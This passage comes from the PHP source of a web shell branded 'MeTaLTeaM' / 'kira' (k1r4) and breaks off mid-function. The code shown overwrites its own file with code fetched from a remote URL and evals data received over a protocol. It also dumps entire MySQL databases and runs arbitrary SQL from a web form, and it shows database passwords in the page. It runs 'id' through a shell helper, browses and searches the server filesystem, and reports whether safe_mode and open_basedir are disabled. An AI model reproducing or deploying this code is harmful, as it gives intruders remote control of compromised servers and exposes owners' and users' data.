533 if ($update)
534 {
535 $confvars = array();
536 $sourceurl = $string[0];
537 $source = file_get_contents($sourceurl);
538 if (!$source) {return "Can't fetch update!";}
539 else
540 {
541 $fp = fopen(__FILE__,"w");
542 if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download kira.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
543 else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
544 }
545 }
546 else {return "New version are available: ".$string[1];}
547 }
548 elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
549 else {return "Error in protocol: segmentation failed! (".$data.") ";}
550 }
551}
552}
553if (!function_exists("mysql_dump"))
554{
555function mysql_dump($set)
556{
557 global $shver;
558 $sock = $set["sock"];
559 $db = $set["db"];
560 $print = $set["print"];
561 $nl2br = $set["nl2br"];
562 $file = $set["file"];
563 $add_drop = $set["add_drop"];
564 $tabs = $set["tabs"];
565 $onlytabs = $set["onlytabs"];
566 $ret = array();
567 $ret["err"] = array();
568 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
569 if (empty($db)) {$db = "db";}
570 if (empty($print)) {$print = 0;}
571 if (empty($nl2br)) {$nl2br = 0;}
572 if (empty($add_drop)) {$add_drop = TRUE;}
573 if (empty($file))
574 {
575 $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
576 }
577 if (!is_array($tabs)) {$tabs = array();}
578 if (empty($add_drop)) {$add_drop = TRUE;}
579 if (sizeof($tabs) == 0)
580 {
581 // retrive tables-list
582 $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
583 if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
584 }
585 $out = "# Dumped by kira.SQL v. ".$shver."
586# Home page: http://google.com
587#
588# Host settings:
589# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
590# Date: ".date("d.m.Y H:i:s")."
591# DB: \"".$db."\"
592#---------------------------------------------------------
593";
594 $c = count($onlytabs);
595 foreach($tabs as $tab)
596 {
597 if ((in_array($tab,$onlytabs)) or (!$c))
598 {
599 if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
600 // recieve query for create table structure
601 $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
602 if (!$res) {$ret["err"][] = mysql_smarterror();}
603 else
604 {
605 $row = mysql_fetch_row($res);
606 $out .= $row["1"].";\n\n";
607 // recieve table variables
608 $res = mysql_query("SELECT * FROM `$tab`", $sock);
609 if (mysql_num_rows($res) > 0)
610 {
611 while ($row = mysql_fetch_assoc($res))
612 {
613 $keys = implode("`, `", array_keys($row));
614 $values = array_values($row);
615 foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
616 $values = implode("', '", $values);
617 $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
618 $out .= $sql;
619 }
620 }
621 }
622 }
623 }
624 $out .= "#---------------------------------------------------------------------------------\n\n";
625 if ($file)
626 {
627 $fp = fopen($file, "w");
628 if (!$fp) {$ret["err"][] = 2;}
629 else
630 {
631 fwrite ($fp, $out);
632 fclose ($fp);
633 }
634 }
635 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
636 return $out;
637}
638}
639if (!function_exists("mysql_buildwhere"))
640{
641function mysql_buildwhere($array,$sep=" and",$functs=array())
642{
643 if (!is_array($array)) {$array = array();}
644 $result = "";
645 foreach($array as $k=>$v)
646 {
647 $value = "";
648 if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
649 $value .= "'".addslashes($v)."'";
650 if (!empty($functs[$k])) {$value .= ")";}
651 $result .= "`".$k."` = ".$value.$sep;
652 }
653 $result = substr($result,0,strlen($result)-strlen($sep));
654 return $result;
655}
656}
657if (!function_exists("mysql_fetch_all"))
658{
659function mysql_fetch_all($query,$sock)
660{
661 if ($sock) {$result = mysql_query($query,$sock);}
662 else {$result = mysql_query($query);}
663 $array = array();
664 while ($row = mysql_fetch_array($result)) {$array[] = $row;}
665 mysql_free_result($result);
666 return $array;
667}
668}
669if (!function_exists("mysql_smarterror"))
670{
671function mysql_smarterror($type,$sock)
672{
673 if ($sock) {$error = mysql_error($sock);}
674 else {$error = mysql_error();}
675 $error = htmlspecialchars($error);
676 return $error;
677}
678}
679if (!function_exists("mysql_query_form"))
680{
681function mysql_query_form()
682{
683 global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
684 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
685 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
686 if ((!$submit) or ($sql_act))
687 {
688 echo "<table border=0><tr><td><form name=\"k1r4_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
689 if ($tbl_struct)
690 {
691 echo "<td valign=\"top\"><b>Fields:</b><br>";
692 foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.k1r4_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
693 echo "</td></tr></table>";
694 }
695 }
696 if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
697}
698}
699if (!function_exists("mysql_create_db"))
700{
701function mysql_create_db($db,$sock="")
702{
703 $sql = "CREATE DATABASE `".addslashes($db)."`;";
704 if ($sock) {return mysql_query($sql,$sock);}
705 else {return mysql_query($sql);}
706}
707}
708if (!function_exists("mysql_query_parse"))
709{
710function mysql_query_parse($query)
711{
712 $query = trim($query);
713 $arr = explode (" ",$query);
714 /*array array()
715 {
716 "METHOD"=>array(output_type),
717 "METHOD1"...
718 ...
719 }
720 if output_type == 0, no output,
721 if output_type == 1, no output if no error
722 if output_type == 2, output without control-buttons
723 if output_type == 3, output with control-buttons
724 */
725 $types = array(
726 "SELECT"=>array(3,1),
727 "SHOW"=>array(2,1),
728 "DELETE"=>array(1),
729 "DROP"=>array(1)
730 );
731 $result = array();
732 $op = strtoupper($arr[0]);
733 if (is_array($types[$op]))
734 {
735 $result["propertions"] = $types[$op];
736 $result["query"] = $query;
737 if ($types[$op] == 2)
738 {
739 foreach($arr as $k=>$v)
740 {
741 if (strtoupper($v) == "LIMIT")
742 {
743 $result["limit"] = $arr[$k+1];
744 $result["limit"] = explode(",",$result["limit"]);
745 if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
746 unset($arr[$k],$arr[$k+1]);
747 }
748 }
749 }
750 }
751 else {return FALSE;}
752}
753}
754if (!function_exists("k1r4fsearch"))
755{
756function k1r4fsearch($d)
757{
758 global $found;
759 global $found_d;
760 global $found_f;
761 global $search_i_f;
762 global $search_i_d;
763 global $a;
764 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
765 $h = opendir($d);
766 while (($f = readdir($h)) !== FALSE)
767 {
768 if($f != "." && $f != "..")
769 {
770 $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
771 if (is_dir($d.$f))
772 {
773 $search_i_d++;
774 if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
775 if (!is_link($d.$f)) {k1r4fsearch($d.$f);}
776 }
777 else
778 {
779 $search_i_f++;
780 if ($bool)
781 {
782 if (!empty($a["text"]))
783 {
784 $r = @file_get_contents($d.$f);
785 if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
786 if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
787 if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
788 else {$bool = strpos(" ".$r,$a["text"],1);}
789 if ($a["text_not"]) {$bool = !$bool;}
790 if ($bool) {$found[] = $d.$f; $found_f++;}
791 }
792 else {$found[] = $d.$f; $found_f++;}
793 }
794 }
795 }
796 }
797 closedir($h);
798}
799}
800if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
801//Sending headers
802@ob_start();
803@ob_implicit_flush(0);
804function onphpshutdown()
805{
806 global $gzipencode,$ft;
807 if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
808 {
809 $v = @ob_get_contents();
810 @ob_end_clean();
811 @ob_start("ob_gzHandler");
812 echo $v;
813 @ob_end_flush();
814 }
815}
816function k1r4exit()
817{
818 onphpshutdown();
819 exit;
820}
821header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
822header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
823header("Cache-Control: no-store, no-cache, must-revalidate");
824header("Cache-Control: post-check=0, pre-check=0", FALSE);
825header("Pragma: no-cache");
826if (empty($tmpdir))
827{
828 $tmpdir = ini_get("upload_tmp_dir");
829 if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
830}
831$tmpdir = realpath($tmpdir);
832$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
833if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
834if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
835else {$tmpdir_logs = realpath($tmpdir_logs);}
836if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
837{
838 $safemode = TRUE;
839 $hsafemode = "<font color=red>ON (secure)</font>";
840}
841else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (no secure)</font>";}
842$v = @ini_get("open_basedir");
843if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
844else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
845$sort = htmlspecialchars($sort);
846if (empty($sort)) {$sort = $sort_default;}
847$sort[1] = strtolower($sort[1]);
848$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
849if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
850$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
851@ini_set("highlight.bg",$highlight_bg); //FFFFFF
852@ini_set("highlight.comment",$highlight_comment); //#FF8000
853@ini_set("highlight.default",$highlight_default); //#0000BB
854@ini_set("highlight.html",$highlight_html); //#000000
855@ini_set("highlight.keyword",$highlight_keyword); //#007700
856@ini_set("highlight.string",$highlight_string); //#DD0000
857if (!is_array($actbox)) {$actbox = array();}
858$dspact = $act = htmlspecialchars($act);
859$disp_fullpath = $ls_arr = $notls = null;
860$ud = urlencode($d);
861?>
862<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - MeTaLTeaM.ORG</title><STYLE>
863TD { FONT-SIZE: 8pt; COLOR: #009900; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #0099CC; FONT-FAMILY: Tahoma; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #000099; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #000099; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #000000;}body,td,th { font-family: verdana; color: #CCCCCC; font-size: 11px;}body { background-color: #000000;}
864</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>MeTaLTeaM <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
865$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
866if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
867$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
868if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
869$d = str_replace("\\\\","\\",$d);
870$dispd = htmlspecialchars($d);
871$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
872$i = 0;
873foreach($pd as $b)
874{
875 $t = "";
876 $j = 0;
877 foreach ($e as $r)
878 {
879 $t.= $r.DIRECTORY_SEPARATOR;
880 if ($j == $i) {break;}
881 $j++;
882 }
883 echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
884 $i++;
885}
886echo "&nbsp;&nbsp;&nbsp;";
887if (is_writable($d))
888{
889 $wd = TRUE;
890 $wdt = "<font color=green>[ ok ]</font>";
891 echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
892}
893else
894{
895 $wd = FALSE;
896 $wdt = "<font color=red>[ Read-Only ]</font>";
897 echo "<b>".view_perms_color($d)."</b>";
898}
899if (is_callable("disk_free_space"))
900{
901 $free = disk_free_space($d);
902 $total = disk_total_space($d);
903 if ($free === FALSE) {$free = 0;}
904 if ($total === FALSE) {$total = 0;}
905 if ($free < 0) {$free = 0;}
906 if ($total < 0) {$total = 0;}
907 $used = $total-$free;
908 $free_percent = round(100/($total/$free),2);
909 echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
910}
911echo "<br>";
912$letters = "";
913if ($win)
914{
915 $v = explode("\\",$d);
916 $v = $v[0];
917 foreach (range("a","z") as $letter)
918 {
919 $bool = $isdiskette = in_array($letter,$safemode_diskettes);
920 if (!$bool) {$bool = is_dir($letter.":\\");}
921 if ($bool)
922 {
923 $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
924 if ($letter.":" != $v) {$letters .= $letter;}
925 else {$letters .= "<font color=green>".$letter."</font>";}
926 $letters .= " ]</a> ";
927 }
928 }
929 if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
930}
931if (count($quicklaunch) > 0)
932{
933 foreach($quicklaunch as $item)
934 {
935 $item[1] = str_replace("%d",urlencode($d),$item[1]);
936 $item[1] = str_replace("%sort",$sort,$item[1]);
937 $v = realpath($d."..");
938 if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
939 $item[1] = str_replace("%upd",urlencode($v),$item[1]);
940 echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
941 }
942}
943echo "</p></td></tr></table><br>";
944if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
945echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
946if ($act == "") {$act = $dspact = "ls";}
947if ($act == "sql")
948{
949 $sql_surl = $surl."act=sql";
950 if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
951 if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
952 if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
953 if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
954 if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
955 $sql_surl .= "&";
956 ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
957 if ($sql_server)
958 {
959 $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
960 $err = mysql_smarterror();
961 @mysql_select_db($sql_db,$sql_sock);
962 if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
963 }
964 else {$sql_sock = FALSE;}
965 echo "<b>SQL Manager:</b><br>";
966 if (!$sql_sock)
967 {
968 if (!$sql_server) {echo "NO CONNECTION";}
969 else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
970 }
971 else
972 {
973 $sqlquicklaunch = array();
974 $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
975 $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
976 $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
977 $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
978 $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
979 $sqlquicklaunch[] = array("Logout",$surl."act=sql");
980 echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
981 if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
982 echo "</center>";
983 }
984 echo "</td></tr><tr>";
985 if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
986 else
987 {
988 //Start left panel
989 if (!empty($sql_db))
990 {
991 ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
992 $result = mysql_list_tables($sql_db);
993 if (!$result) {echo mysql_smarterror();}
994 else
995 {
996 echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
997 $c = 0;
998 while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
999 if (!$c) {echo "No tables found in database.";}
1000 }
1001 }
1002 else
1003 {
1004 ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
1005 $result = mysql_list_dbs($sql_sock);
1006 if (!$result) {echo mysql_smarterror();}
1007 else
1008 {
1009 ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
1010 $c = 0;
1011 $dbs = "";
1012 while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
1013 echo "<option value=\"\">Databases (".$c.")</option>";
1014 echo $dbs;
1015 }
1016 ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
1017 }
1018 //End left panel
1019 echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
1020 //Start center panel
1021 $diplay = TRUE;
1022 if ($sql_db)
1023 {
1024 if (!is_numeric($c)) {$c = 0;}
1025 if ($c == 0) {$c = "no";}
1026 echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
1027 if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
1028 echo "</b></center>";
1029 $acts = array("","dump");
1030 if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1031 elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
1032 elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
1033 elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1034 elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1035 elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1036 elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1037 elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
1038 elseif ($sql_tbl_act == "insert")
1039 {
1040 if ($sql_tbl_insert_radio == 1)
1041 {
1042 $keys = "";
1043 $akeys = array_keys($sql_tbl_insert);
1044 foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
1045 if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
1046 $values = "";
1047 $i = 0;
1048 foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
1049 if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
1050 $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
1051 $sql_act = "query";
1052 $sql_tbl_act = "browse";
1053 }
1054 elseif ($sql_tbl_insert_radio == 2)
1055 {
1056 $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
1057 $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
1058 $result = mysql_query($sql_query) or print(mysql_smarterror());
1059 $result = mysql_fetch_array($result, MYSQL_ASSOC);
1060 $sql_act = "query";
1061 $sql_tbl_act = "browse";
1062 }
1063 }
1064 if ($sql_act == "query")
1065 {
1066 echo "<hr size=\"1\" noshade>";
1067 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
1068 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
